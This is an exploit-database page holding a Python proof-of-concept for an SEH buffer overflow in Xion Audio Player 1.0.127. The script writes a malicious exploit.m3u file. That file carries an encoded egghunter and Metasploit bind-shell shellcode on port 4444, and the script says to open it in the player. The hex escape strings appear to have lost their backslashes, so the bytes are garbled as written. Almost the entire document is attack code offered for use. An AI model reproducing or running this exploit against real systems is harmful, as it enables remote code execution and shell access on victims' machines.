[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Published : 2010-11-23
# Author : 0v3r
# Previous Title : Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day
# Next Title : MediaCoder 0.7.5.4795 .m3u Buffer Overflow (SEH) 


# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Date: 11/23/2010
# Author: 0v3r
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe
# Version: 1.0.127
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# encoded with alpha3 encoder by skylined
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")

#win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode= ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x37x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax47"
"x58x30x42x31x50x41x42x6bx42x41x57x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x4dx39x49x6cx33"
"x5ax48x6bx42x6dx38x68x5ax59x6bx4fx49x6fx4bx4fx63"
"x50x6cx4bx30x6cx64x64x64x64x6cx4bx50x45x67x4cx4c"
"x4bx51x6cx37x75x61x68x76x61x58x6fx4ex6bx52x6fx72"
"x38x4cx4bx73x6fx45x70x43x31x68x6bx31x59x4cx4bx70"
"x34x4cx4bx57x71x7ax4ex34x71x4fx30x6ex79x6cx6cx6b"
"x34x6fx30x43x44x33x37x6bx71x69x5ax76x6dx53x31x49"
"x52x5ax4bx4cx34x45x6bx52x74x41x34x54x68x50x75x38"
"x65x6cx4bx63x6fx54x64x53x31x38x6bx43x56x4ex6bx36"
"x6cx72x6bx4ex6bx53x6fx75x4cx34x41x78x6bx64x43x64"
"x6cx6ex6bx4bx39x50x6cx41x34x65x4cx52x41x7ax63x64"
"x71x69x4bx51x74x6ex6bx71x53x66x50x4cx4bx77x30x74"
"x4cx6cx4bx74x30x45x4cx4cx6dx6ex6bx43x70x33x38x73"
"x6ex53x58x4cx4ex50x4ex64x4ex38x6cx46x30x6bx4fx4e"
"x36x65x36x61x43x63x56x33x58x36x53x34x72x71x78x44"
"x37x34x33x46x52x41x4fx42x74x6bx4fx48x50x65x38x5a"
"x6bx7ax4dx39x6cx45x6bx52x70x4bx4fx6ax76x71x4fx4e"
"x69x6dx35x50x66x6dx51x7ax4dx63x38x33x32x32x75x50"
"x6ax43x32x79x6fx38x50x45x38x68x59x73x39x4cx35x4e"
"x4dx56x37x6bx4fx6ax76x76x33x30x53x71x43x76x33x71"
"x43x41x53x76x33x73x73x71x43x6bx4fx4ex30x71x76x31"
"x78x37x61x41x4cx70x66x46x33x4bx39x48x61x6dx45x70"
"x68x39x34x57x6ax30x70x4bx77x72x77x6bx4fx78x56x31"
"x7ax46x70x61x41x63x65x6bx4fx4ex30x35x38x6cx64x6c"
"x6dx36x4ex6dx39x46x37x6bx4fx5ax76x42x73x71x45x59"
"x6fx68x50x75x38x6bx55x37x39x6cx46x67x39x46x37x69"
"x6fx4ax76x70x50x73x64x46x34x61x45x6bx4fx78x50x6d"
"x43x42x48x6bx57x54x39x6bx76x50x79x50x57x6bx4fx48"
"x56x70x55x49x6fx6ax70x45x36x41x7ax73x54x75x36x62"
"x48x65x33x30x6dx6ex69x7ax45x30x6ax52x70x63x69x75"
"x79x48x4cx4fx79x6dx37x71x7ax57x34x6ex69x58x62x67"
"x41x6bx70x69x63x6ex4ax4bx4ex77x32x66x4dx6bx4ex41"
"x52x66x4cx5ax33x6cx4dx51x6ax66x58x6ex4bx4cx6bx4e"
"x4bx42x48x70x72x69x6ex78x33x67x66x6bx4fx70x75x67"
"x34x4bx4fx4ex36x33x6bx70x57x56x32x50x51x46x31x46"
"x31x41x7ax54x41x30x51x41x41x66x35x30x51x69x6fx4e"
"x30x50x68x6cx6dx5ax79x77x75x4ax6ex52x73x39x6fx58"
"x56x30x6ax4bx4fx6bx4fx50x37x59x6fx6ex30x6cx4bx36"
"x37x79x6cx6dx53x78x44x31x74x4bx4fx6bx66x30x52x69"
"x6fx6ex30x65x38x6ax50x6ex6ax76x64x73x6fx63x63x49"
"x6fx4bx66x69x6fx4ex30x47")

junk  = "A" * 221

nseh  = "x61" 		            #popad
nseh += "x6e"		            #nop/align

seh   = "x7bx41"                  # POP POP RET

#fix eax to point to the egghunter
prepare  = "x6e"                   #nop/align
prepare += "x05x14x11"     	    #add eax,0x11001400
prepare += "x6e"             	    #nop/align
prepare += "x2dx13x11"     	    #sub eax,0x11001300
prepare += "x6e"             	    #nop/alignn

#jump to eax
jump  = "x50"		      	    #push eax
jump +="x6e"		      	    #nop/align
jump += "xc3"		     	    #retn

#align buffer to hit the egghunter
align = "D" * 112

#few junk before shellcode
preshell = "D" * 500

#the egghunters tag
egg = "w00tw00t"

#few more junk after our shellcode
#I noticed that the bigger the buffer the more reliable the exploit
postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg  + preshell + shellcode ))

#the final buffer
buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell

try:
	f = open("exploit.m3u",'w')
	f.write(buff)
	f.close()
	
	print "n"	
	print "t-----------------------------------------------------------------"
	print "t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |"
	print "t-----------------------------------------------------------------"
	print "n"
 
	print "t- File successfully created..."
	print "t- To run exploit open the file exploit.m3u with Xion Audio Player...n" 
except:
	print "t-Oooops! Can't write file ...n"